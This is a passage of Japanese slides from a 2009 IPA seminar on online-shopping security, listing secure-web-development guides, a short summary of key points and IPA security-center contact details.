137 安全なウェブサイトの作り方 書籍 ウェブ IPA に届出られた脆弱性関連情報をもとに 対策をまとめたもの 脆弱性ごとに解説と 根本的解決 保健的対策 を記載 失敗例 について記載 ウェブセキュリティの実装状況のチェックリストつき Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 73

138 セキュア プログラミング講座 ( 新版 ) 安全なプログラムについて要求定義や設計段階からの対策について記載 WEBアプリケーション編 C/C++ 言語編 ウェブ Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 74

139 まとめ : ウェブアプリケーションの安全性向上のためのポイント 実施する対策の効果や性質を正しく理解する 安全なプログラミング知識を身に付ける 参考サイト : 安全なウェブサイトの作り方 セキュア プログラミング講座 ( 新版 ) 知っていますか? 脆弱性 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 75

140 セキュリティセンター (IPA/ISEC) 情報セキュリティ関連相談窓口 : TEL 03(5978)7509 ( 平日 10:00-12:00 13:30-17:00) FAX 03(5978) virus@ipa.go.jp ( ウイルス関連 ) crack@ipa.go.jp ( 不正アクセス関連 ) winny119@ipa.go.jp (Winny 関連 ) isec-info@ipa.go.jp ( その他セキュリティ全般 ) Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 76